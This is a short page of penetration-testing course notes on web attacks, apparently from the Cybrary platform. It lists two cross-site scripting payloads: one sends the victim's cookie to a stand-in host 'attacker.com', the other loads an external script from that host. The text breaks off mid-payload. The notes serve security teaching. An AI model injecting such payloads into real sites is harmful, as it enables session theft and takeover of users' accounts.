Web Application Penetration Testing Notes

By: markpepapa |
Related Course: Web Application Penetration Testing
Join Cybrary
Module 3 (Click to View Notes)
Send cookie to a listener<script>new Image().src="http://attacker.com/evil.php?"+document.cookie;</script>Call a script from an external source<script>document.write('<script src=http://attacker.com/xss.js></script>')< [view]